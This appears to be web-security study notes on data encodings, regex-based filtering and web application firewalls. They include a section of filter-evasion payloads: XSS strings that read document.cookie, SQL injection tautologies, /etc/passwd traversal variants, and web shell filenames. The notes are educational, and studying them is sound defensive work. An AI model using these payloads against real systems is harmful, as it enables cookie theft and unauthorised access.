Encoding & Filtering

Filtering with Regex, Types of encoding, Bypass WAF and More


Data Encoding Basics

URL encoding

The following chart shows which characters are "safe" and which characters should be encoded in URLs.

Some commonly encoded characters are:

| Character | Purpose in URL | Encoding |
|---|---|---|
| `#` | Separates anchors | %23 |
| `?` | Separates the query string | %3F |
| `&` | Separates query elements | %26 |
| `%` | Indicates an encoded character | %25 |
| `/` | Separates domain and directories | %2F |
| `+` | Indicates a space | %2B |
| (space) | Not recommended | %20 or + |
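The mappings in the table can be checked with Python's standard `urllib.parse` module. This is a minimal sketch; note that `quote()` leaves `/` unencoded by default, so `safe=""` is passed to force every character to be encoded.

```python
from urllib.parse import quote, quote_plus, unquote

# safe="" forces "/" to be percent-encoded as well (quote keeps it by default)
ENCODED = {ch: quote(ch, safe="") for ch in "#?&%/+"}
for ch, enc in ENCODED.items():
    print(f"{ch!r} -> {enc}")

print(quote("a b"))       # a%20b  (space as %20)
print(quote_plus("a b"))  # a+b    (space as +, form/query-string style)
print(unquote("%3F%26"))  # ?&     (decoding reverses the mapping)
```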

HTML encoding

Documents transmitted via HTTP can specify their character encoding with the charset parameter of the Content-Type HTTP header:

Content-Type:text/html;charset=utf-8

Define character encoding using HTTP

# PHP > Uses the header() function to send a raw HTTP header:
header('Content-Type:text/html;charset=utf-8');

# ASP.Net > Uses the response object:
<%Response.charset="utf-8"%>

# JSP > Uses the page directive:
<%@ page contentType="text/html; charset=UTF-8"%>

# Using the META directive:
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">

# With HTML5, it is also possible to write:
<meta charset="utf-8">
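The declared charset matters because the same bytes decode to different text under different charsets. A minimal Python sketch (the header value and body are illustrative) that reads the charset parameter with the standard `email.message.Message` class and decodes a body with it:

```python
from email.message import Message

# Parse the charset parameter out of a Content-Type header value
msg = Message()
msg["Content-Type"] = "text/html; charset=UTF-8"
charset = msg.get_content_charset()  # returned lower-cased: "utf-8"

body = "café".encode("utf-8")        # raw bytes as they would travel over HTTP
print(charset, body.decode(charset)) # correct charset: "café"
print(body.decode("latin-1"))        # wrong charset: mojibake "cafÃ©"
```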

HTML4 and HTML5 specifications about special characters

Character references must start with a U+0026 AMPERSAND character (&):

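| Character reference | Rule | Encoded character (`<`) |
|---|---|---|
| Named entity | `&` + named character reference + `;` | `&lt;` |
| Numeric decimal | `&` + `#` + decimal code point + `;` | `&#60;` |
| Numeric hexadecimal | `&` + `#x` + hexadecimal code point + `;` | `&#x3c;` / `&#X3C;` |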

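Some variations:

| Character reference | Variation | Encoded character |
|---|---|---|
| Numeric decimal | No terminator (`;`) | `&#60` |
| Numeric decimal | One or more zeroes before code | `&#060` / `&#0000060` |
| Numeric hexadecimal | No terminator (`;`) | `&#x3c` |
| Numeric hexadecimal | One or more zeroes before code (after the `x`) | `&#x03c` / `&#x00003c` |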
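To see that all these spellings resolve to the same character, here is a quick sketch with Python's `html.unescape`, which follows the HTML5 character-reference rules (browsers should behave similarly, but treat this as an approximation of a real HTML parser):

```python
import html

# Different spellings of "<" from the two tables above
VARIANTS = [
    "&lt;", "&#60;", "&#x3c;", "&#X3C;",             # canonical forms
    "&#60", "&#x3c",                                 # no terminator
    "&#060;", "&#0000060;", "&#x03c;", "&#x00003c;", # leading zeroes
]

for ref in VARIANTS:
    print(ref, "->", html.unescape(ref))

# Zeroes must follow the "x": "&#0x3c" is parsed as "&#0" followed by "x3c",
# so it does not produce "<"
print(repr(html.unescape("&#0x3c")))
```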

Base (36|64) encoding

Base 36 Encoding Scheme

Base36 is the most compact case-insensitive alphanumeric numeral system using ASCII characters: its alphabet contains all digits [0-9] and Latin letters [A-Z].

It is used in many real-world scenarios:

Reddit used it for identifying both posts and comments.

Some URL shortening services like TinyURL use Base36 integers as compact, alphanumeric identifiers.

PHP

PHP uses the base_convert() function to convert numbers:

OHPE in Base 10 is <?=base_convert("OHPE",36,10);?>

JavaScript: JavaScript uses two functions:

(1142690).toString(36)   // encode
1142690..toString(36)    // encode (alternative syntax)
parseInt("ohpe",36)      // decode
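For comparison, a minimal Python sketch of the same round trip. Python has no built-in Base36 encoder, so `base36_encode` below is a hypothetical helper using repeated division; decoding relies on the built-in `int(s, 36)`.

```python
import string

DIGITS = string.digits + string.ascii_lowercase  # 0-9 then a-z: 36 symbols

def base36_encode(n: int) -> str:
    """Encode a non-negative integer in Base36 (lowercase, like JS toString(36))."""
    if n == 0:
        return "0"
    out = []
    while n:
        n, rem = divmod(n, 36)  # peel off the least significant Base36 digit
        out.append(DIGITS[rem])
    return "".join(reversed(out))

def base36_decode(s: str) -> int:
    # int() accepts bases up to 36 and is case-insensitive for letters
    return int(s, 36)

print(base36_encode(1142690))  # ohpe
print(base36_decode("OHPE"))   # 1142690
```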

Base64 Encoding Scheme

Base64 is one of the most widespread binary-to-text encoding schemes to date. It was designed to allow binary data to be represented as ASCII text.

The alphabet of the Base64 encoding scheme is composed of digits [0-9] and Latin letters, both upper and lower case [a-zA-Z], for a total of 62 values. To complete the character set to 64, there are the plus (+) and slash (/) characters.

The algorithm splits the message into groups of 6 bits and converts each group into the corresponding ASCII character of the conversion table.

That's why the alphabet has 64 characters (2 raised to the 6th power = 64).

The input is processed in blocks of 3 bytes (24 bits, i.e. four 6-bit groups). If the last block contains only 2 bytes, the output is padded with one =
If the last block contains only 1 byte, the output is padded with ==

PHP: PHP uses the base64_encode and base64_decode functions, based on the MIME Base64 implementation:

<?=base64_encode('encode this string')?> //encode
<?=base64_decode('ZW5jb2RlIHRoaXMgc3RyaW5n')?> //decode

JavaScript: Many browsers can handle Base64 natively through the btoa and atob functions:

window.btoa('encode this string'); //encode
window.atob('ZW5jb2RlIHRoaXMgc3RyaW5n'); //decode
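The 6-bit grouping and padding rules described above can be written out by hand. This is an illustrative sketch only (`b64_manual` is a hypothetical name); real code should use the standard `base64` module, which the sketch is checked against.

```python
import base64
import string

ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"

def b64_manual(data: bytes) -> str:
    out = []
    for i in range(0, len(data), 3):
        chunk = data[i:i + 3]
        missing = 3 - len(chunk)
        # Pad the block with zero bytes to a full 24 bits
        n = int.from_bytes(chunk + b"\x00" * missing, "big")
        # Split the 24 bits into four 6-bit groups and map each to the alphabet
        chars = [ALPHABET[(n >> shift) & 0x3F] for shift in (18, 12, 6, 0)]
        # Characters that only carry padding bits become "="
        if missing:
            chars[-missing:] = "=" * missing
        out.extend(chars)
    return "".join(out)

for sample in (b"a", b"ab", b"abc", b"encode this string"):
    print(sample, b64_manual(sample), base64.b64encode(sample).decode())
```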

Unicode encoding

Unicode, aka the ISO/IEC 10646 Universal Character Set, can expose web applications to security attacks such as filter bypasses.

UTF = Unicode Transformation Format:

- UTF-8
- UTF-16
- UTF-32
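The three transformation formats store the same code point with different byte sequences. A small Python sketch using U+2603 (the snowman) as an arbitrary example; the big-endian codecs are used so that no byte order mark is added:

```python
# The same code point, U+2603 (snowman), in the three transformation formats
ch = "\u2603"
for codec in ("utf-8", "utf-16-be", "utf-32-be"):
    print(codec, ch.encode(codec).hex(" "))
```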

Homoglyph | Visual Spoofing

In typography, a homoglyph is one of two or more characters, or glyphs, with shapes that either appear identical or cannot be differentiated by quick visual inspection. -Wikipedia

Homograph - a word that looks the same as another word
Homoglyph - a look-alike character used to create homographs

Example: in "Visual Spoofing", each "o" could be either
U+006F (Latin small letter o) or
U+03BF (Greek small letter omicron)

Homoglyphs can be used to bypass anti cross-site scripting and SQL injection filters.

Characters and strings can also be transformed by software processes in other ways, such as normalization, canonicalization, best-fit mapping, etc.
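A sketch of why normalization matters, under an assumed setup: a hypothetical filter inspects the raw input, and the application applies Unicode NFKC normalization afterwards. Fullwidth "＜" and "＞" (U+FF1C, U+FF1E) slip past the check and become ASCII `<` and `>` after normalization. True homoglyphs such as the Greek omicron are not folded by NFKC at all.

```python
import unicodedata

def naive_filter(value: str) -> bool:
    """Hypothetical blacklist: accept input only if it contains no '<script'."""
    return "<script" not in value.lower()

# Fullwidth less-than/greater-than signs instead of ASCII < and >
payload = "\uff1cscript\uff1ealert(1)\uff1c/script\uff1e"

print(naive_filter(payload))   # True: the check passes
normalized = unicodedata.normalize("NFKC", payload)
print(normalized)              # <script>alert(1)</script>

# Homoglyph: Greek omicron (U+03BF) is not mapped to Latin "o" by NFKC
lookalike = "p\u03bfst"
print(lookalike == "post", unicodedata.normalize("NFKC", lookalike) == "post")
```

The bypass only works when validation happens before normalization; normalizing first and then filtering closes this particular gap.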


Multiple (De|En) Codings

It is common to abuse multiple encodings to bypass security measures.
```
URL-Encoding > URL
```
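Double URL encoding is one common case. A minimal sketch, assuming a hypothetical filter that URL-decodes the input once before looking for `<`, while the back end decodes it a second time:

```python
from urllib.parse import quote, unquote

payload = "<script>"
once = quote(payload)   # %3Cscript%3E
twice = quote(once)     # %253Cscript%253E ("%" itself becomes %25)

def filter_decodes_once(value: str) -> bool:
    """Hypothetical filter: URL-decode once, then block any '<'."""
    return "<" not in unquote(value)

print(filter_decodes_once(once))    # False: blocked
print(filter_decodes_once(twice))   # True: after one decode it only sees %3C
print(unquote(unquote(twice)))      # <script>: a second decode restores the payload
```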

Filtering Basics

A common, and often recommended, best practice to protect web applications against malicious attacks is the use of specific input filtering and output encoding controls.

These kinds of controls may range from naive blacklists to well-designed, highly restrictive whitelists. What about the real world? We are somewhere in the middle!

Controls can be implemented at different layers in a web application. They can take the form of libraries and APIs, ideally built by internal specialists or external organizations, like ESAPI by OWASP.
Security controls are also built into the most common browsers.

Generally, these solutions fall into the IDS and IPS world, but for web applications the most common choice is a Web Application Firewall (WAF).
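The gap between the two ends of that range can be sketched in a few lines. Both patterns below are hypothetical examples for a username field, not rules from any real product: the blacklist only knows one bad pattern, while the whitelist only knows the good ones.

```python
import re

# Hypothetical naive blacklist: block only the classic <script> tag
BLACKLIST = re.compile(r"<script", re.IGNORECASE)

# Hypothetical strict whitelist for a username: letters, digits, underscore
WHITELIST = re.compile(r"[A-Za-z0-9_]{1,32}")

def blacklist_ok(value: str) -> bool:
    return BLACKLIST.search(value) is None

def whitelist_ok(value: str) -> bool:
    return WHITELIST.fullmatch(value) is not None

for value in ("alice_01", "<script>alert(1)</script>", "<svg/onload=alert(1)>"):
    print(f"{value!r}: blacklist={blacklist_ok(value)} whitelist={whitelist_ok(value)}")
```

The `<svg>` payload passes the blacklist but not the whitelist, which is why restrictive whitelists are preferred where the expected input format is known.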

Regular Expressions (RE or RegEx)

Regular expressions are the standard way to define filter rules. Mastering regex is fundamental to understanding how to bypass filters, because regular expressions are extremely powerful.
A regex is a special sequence of characters used for describing a search pattern.

→ regular expression = regex

→ pattern matched = match

Two main types of regex engines:

| Engine | Programs |
|---|---|
| DFA | awk, egrep, MySQL, Procmail |
| NFA | .NET languages, Java, Perl, PHP, Python, Ruby, PCRE library, vi, grep, less, more |
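One visible difference between the two engine types is how alternation is resolved. Python's `re` is a backtracking, NFA-style engine, so alternatives are tried left to right and the first one that matches wins; a POSIX DFA engine reports the longest leftmost match instead. A small sketch:

```python
import re

# NFA-style: the first alternative that leads to a match wins
print(re.match(r"nfa|nfa not", "nfa not").group())   # nfa

# Reordering the alternatives changes the NFA result.
# A POSIX DFA engine would return "nfa not" for both patterns.
print(re.match(r"nfa not|nfa", "nfa not").group())   # nfa not
```

This is one reason a filter rule tested in one engine can behave differently when it is ported to another.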

Non-printing characters:

They are used to evade poorly written filters and to obfuscate payloads.
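An example of the idea, under stated assumptions: the WHATWG URL parser removes ASCII tab, LF and CR from a URL before parsing it, so `java<TAB>script:` is still treated as `javascript:` by the browser. The filter below is hypothetical, and `strip_tab_newline` mimics only that single parser step.

```python
import re

def naive_filter(url: str) -> bool:
    """Hypothetical filter: reject links that start with 'javascript:'."""
    return not url.lower().startswith("javascript:")

def strip_tab_newline(url: str) -> str:
    # Mimics only one step of the WHATWG URL parser: drop ASCII tab, LF and CR
    return re.sub(r"[\t\n\r]", "", url)

payload = "java\tscript:alert(1)"
print(naive_filter(payload))                          # True: the filter lets it through
print(naive_filter(strip_tab_newline(payload)))       # False: what the browser parses is javascript:
```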

Match Unicode Code Point:

Regular expression flavors that work with Unicode use specific meta-sequences to match code points.
The sequence is \ucode-point, where code-point is the hexadecimal number of the character to match.
Some regex flavors, like PCRE, do not support this notation,
but use the alternative sequence \x{code-point} in its place.

Example:

\u2603   = the snowman character in .NET, Java, JavaScript and Python
\x{2603} = the snowman character in Apache and PHP (PCRE library)
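A quick check of the `\u` notation in Python's `re` module (the sample text is arbitrary). Python 3.8+ additionally accepts `\N{name}` with the official Unicode character name:

```python
import re

text = "I \u2603 regex"

# Python's re understands the \uXXXX escape inside a pattern
match = re.search(r"\u2603", text)
print(match.group(), match.span())

# Python 3.8+: the same character by its Unicode name
print(re.search(r"\N{SNOWMAN}", text) is not None)
```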

Meta-sequence Quality (Unicode properties):

\p{quality-id} = matches characters that have the specified quality
\P{quality-id} = matches characters that do not have it

Match Unicode Category:

# To match letters in all the case variations (lowercase, uppercase and titlecase), this regex does the job:
[\p{Ll}\p{Lu}\p{Lt}]

# As a shorthand, some regex flavors implement this solution:
\p{L&}
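Python's built-in `re` module does not support `\p{...}`, so this sketch emulates the class `[\p{Ll}\p{Lu}\p{Lt}]` with `unicodedata.category()`. It shows that titlecase and non-Latin cased letters are included, while uncased letters (such as Hebrew, category Lo), digits and punctuation are not:

```python
import unicodedata

# Emulates [\p{Ll}\p{Lu}\p{Lt}] (a.k.a. \p{L&}) one character at a time
CASED_LETTER = {"Ll", "Lu", "Lt"}

def is_cased_letter(ch: str) -> bool:
    return unicodedata.category(ch) in CASED_LETTER

# a, Z, titlecase U+01C5, Greek omicron, digit, underscore, Hebrew alef
sample = "aZ\u01c5\u03bf1_\u05d0"
matches = [ch for ch in sample if is_cased_letter(ch)]
print(matches)
```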

Web Application Firewall - WAF

Bypass WAFs

- = instead of using this
→ = the best choice is

Cross-Site Scripting:

- alert('xss') 
- alert(1)
→ prompt('xss') 
→ prompt(8)
→ confirm('xss')
→ confirm(8)
→ alert(/xss/.source)
→ window[/alert/.source](8)

- alert(document.cookie) 
→ with(document)alert(cookie) 
→ alert(document['cookie'])
→ alert(document[/cookie/.source])
→ alert(document[/coo/.source+/kie/.source])

- <img src=x onerror=alert(1);>
→ <svg/onload=alert(1)>
→ <video src=x onerror=alert(1);>
→ <audio src=x onerror=alert(1);>

- javascript:alert(document.cookie)
→ data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
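A simple way to reason about these alternatives is to run them against a candidate filter. The blacklist below is hypothetical and deliberately targets only the "-" payloads; the sketch also decodes the Base64 part of the `data:` URI to show what it carries.

```python
import base64
import re

# Hypothetical naive blacklist aimed at the "-" payloads listed above
BLACKLIST = re.compile(r"alert\(['\"\d]|document\.cookie|<img|javascript:", re.IGNORECASE)

PAYLOADS = [
    "alert('xss')",
    "alert(1)",
    "prompt(8)",
    "alert(/xss/.source)",
    "window[/alert/.source](8)",
    "alert(document.cookie)",
    "with(document)alert(cookie)",
    "alert(document[/coo/.source+/kie/.source])",
    "<img src=x onerror=alert(1);>",
    "<svg/onload=alert(1)>",
    "javascript:alert(document.cookie)",
    "data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=",
]

def bypasses(payload: str) -> bool:
    """True if the hypothetical blacklist does not flag the payload."""
    return BLACKLIST.search(payload) is None

BYPASSES = [p for p in PAYLOADS if bypasses(p)]
for p in BYPASSES:
    print("not blocked:", p)

# The data: URI carries the script Base64-encoded, so the filter never sees it
DECODED = base64.b64decode(PAYLOADS[-1].split(",", 1)[1])
print(DECODED)
```

Note that `<svg/onload=alert(1)>` is still caught here because this filter also matches `alert(1)`: each alternative only evades the specific pattern it avoids.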

Blind SQL Injection

- 'or 1=1           '
- 'or 6=6           '
→ 'or 0x47=0x47     '
- or char(32)=''
→ or 6 is not null

- UNION SELECT
→ UNION ALL SELECT

Directory Traversal

- /etc/passwd
→ /too/../etc/far/../passwd
→ /etc//passwd
→ /etc/ignore/../passwd
→ /etc/passwd........
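The first three variants work against filters that match the literal string while the target later normalizes the path. A sketch with a hypothetical string check and `posixpath.normpath`, which resolves `..` and `//` purely lexically (whether a variant actually reaches the file depends on how the target normalizes paths; the trailing-dots variant relies on different, platform-specific behavior and is not covered):

```python
import posixpath

VARIANTS = [
    "/too/../etc/far/../passwd",
    "/etc//passwd",
    "/etc/ignore/../passwd",
]

def naive_check(path: str) -> bool:
    """Hypothetical filter: block paths containing the literal '/etc/passwd'."""
    return "/etc/passwd" not in path

for path in VARIANTS:
    print(path, naive_check(path), posixpath.normpath(path))
```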

Web Shell

- c99.php
- r57.php
- shell.aspx
- cmd.jsp
- CmdAsp.asp
- augh.php

Detection and Fingerprinting

Citrix NetScaler uses some distinctive cookies in HTTP responses, like ns_af, citrix_ns_id or NSC_
F5 BIG-IP ASM (Application Security Manager) uses cookies starting with TS followed by a string that matches the following regex:

^TS[a-zA-Z0-9]{3,6}

Barracuda uses two cookies: barra_counter_session and BNI__BARRACUDA_LB_COOKIE
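The cookie signatures above can be turned into a small lookup. `fingerprint_cookies` is a hypothetical helper that works on a list of response cookie names; real tools combine many more signals, so a match here is only a hint.

```python
import re

# Signatures taken from the notes above
F5_ASM_COOKIE = re.compile(r"^TS[a-zA-Z0-9]{3,6}")

def fingerprint_cookies(names):
    """Return the WAF products suggested by a list of cookie names (hypothetical helper)."""
    found = set()
    for name in names:
        if name in ("ns_af", "citrix_ns_id") or name.startswith("NSC_"):
            found.add("Citrix NetScaler")
        if F5_ASM_COOKIE.match(name):
            found.add("F5 BIG-IP ASM")
        if name in ("barra_counter_session", "BNI__BARRACUDA_LB_COOKIE"):
            found.add("Barracuda")
    return found

print(fingerprint_cookies(["PHPSESSID", "TS01a2b3c4"]))
```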

Header Rewrite

Some WAFs rewrite the HTTP headers, usually modifying the Server header to deceive attackers.

HTTP Response Code

Some WAFs modify the HTTP response code if the request is hostile, for example:

- mod_security       > 406 Not Acceptable
- AQTRONIX WebKnight > 999 No Hacking

HTTP Response Body

It is also possible to detect a WAF from the response body.

Example:

<body>
…Mod_Security…
…AQTRONIX WebKnight…
</body>

dotDefender Blocked your Request
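The response-code and body signatures listed above can be checked with a small hypothetical helper. The status codes and marker strings come from these notes; the case-insensitive comparison is an assumption, since the exact casing in real block pages may vary.

```python
# Hypothetical helper: match a blocked response against the signatures above
STATUS_SIGNATURES = {406: "mod_security", 999: "AQTRONIX WebKnight"}
BODY_SIGNATURES = {
    "Mod_Security": "mod_security",
    "AQTRONIX WebKnight": "AQTRONIX WebKnight",
    "dotDefender Blocked your Request": "dotDefender",
}

def fingerprint_response(status: int, body: str) -> set:
    found = set()
    if status in STATUS_SIGNATURES:
        found.add(STATUS_SIGNATURES[status])
    lowered = body.lower()
    for marker, product in BODY_SIGNATURES.items():
        if marker.lower() in lowered:
            found.add(product)
    return found

print(fingerprint_response(200, "<h1>dotDefender Blocked your Request</h1>"))
```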

Close Connection

Some WAFs simply drop the connection when they detect a malicious request.

Example: mod_security

Detect WAF

wafw00f is a tool written in Python that can detect up to 20 different WAF products.

The techniques used to detect a WAF are similar to those we have seen previously:

- Cookies
- Server Cloaking
- Response Codes
- Drop Action
- Pre-Built-in Rules

→ nmap --script=http-waf-fingerprint -p 80 <target>

Client-Side Filters

Browsers are the primary means used to address client-side attacks.

Browser Add-ons

NoScript Security Suite is a whitelist-based security tool that disables all executable web content (JavaScript, Java, Flash, Silverlight, …) and lets the user choose which sites are trusted, allowing these technologies only on those sites.

XSS Filter (IE)

The IE XSS Filter rules are stored in the c:\windows\system32\mshtml.dll library. Ways to inspect them:

- Hex editors like WinHex, or Notepad++ with the TextFX plugin
- IDA Pro
- MS-DOS commands:

findstr /C:"sc{r}" \WINDOWS\SYSTEM32\mshtml.dll | find "{" > savepath

Redirecting the output to a file (savepath) gives more readable results.

Neutering in Action

Once a malicious injection is detected, the XSS Filter modifies the evil part of the payload by replacing the neuter character, defined in the rules, with the '#' character.

evil > ev{i}l > ev#l
<svg/onload=alert(1)> > <svg/#nload=alert(1)>
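The neutering step can be simulated to make the rule notation concrete. This is a rough sketch, not the actual IE implementation: it assumes a rule is a regex in which the first `{x}` marks the neuter character, and the `{o}n[a-z]+=` rule is hypothetical.

```python
import re

def compile_rule(rule: str):
    """Turn a rule like 'ev{i}l' into a regex that captures the neuter character.

    Assumes the neuter marker is the first {...} in the rule.
    """
    before, rest = rule.split("{", 1)
    neuter_char, after = rest.split("}", 1)
    return re.compile(f"({before})({neuter_char})({after})")

def neuter(payload: str, rule: str) -> str:
    pattern = compile_rule(rule)
    # Keep the surrounding text and replace only the neuter character with '#'
    return pattern.sub(lambda m: m.group(1) + "#" + m.group(3), payload)

print(neuter("evil", "ev{i}l"))                              # ev#l
print(neuter("<svg/onload=alert(1)>", r"{o}n[a-z]+="))       # <svg/#nload=alert(1)>
```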

Websites that choose to opt out of this protection can use the HTTP response header:

X-XSS-Protection: 0

The same header can also switch the filter to blocking mode:

X-XSS-Protection: 1; mode=block   (instead of sanitizing the page, the browser renders a simple #)

Other browsers, like Safari, used the same scheme.

The XSS Auditor was enabled by default in browsers such as Chrome, Opera and Safari.

The filter analyzes both inbound requests and outbound responses. If it finds executable code within the response, in the parsed HTML data, it stops the script and generates a console message similar to the following: The XSS Auditor refused to execute a script in …